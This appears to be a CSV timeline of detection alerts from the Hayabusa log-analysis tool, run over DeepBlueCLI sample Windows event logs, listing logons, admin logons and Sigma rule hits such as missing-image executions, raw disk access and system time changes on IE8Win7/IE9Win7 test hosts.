2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xd9c6  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\svchost.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x16559  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x16589  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2b7c0  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2b7f0  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xcf564  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xcf598  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x27008  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x27038  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
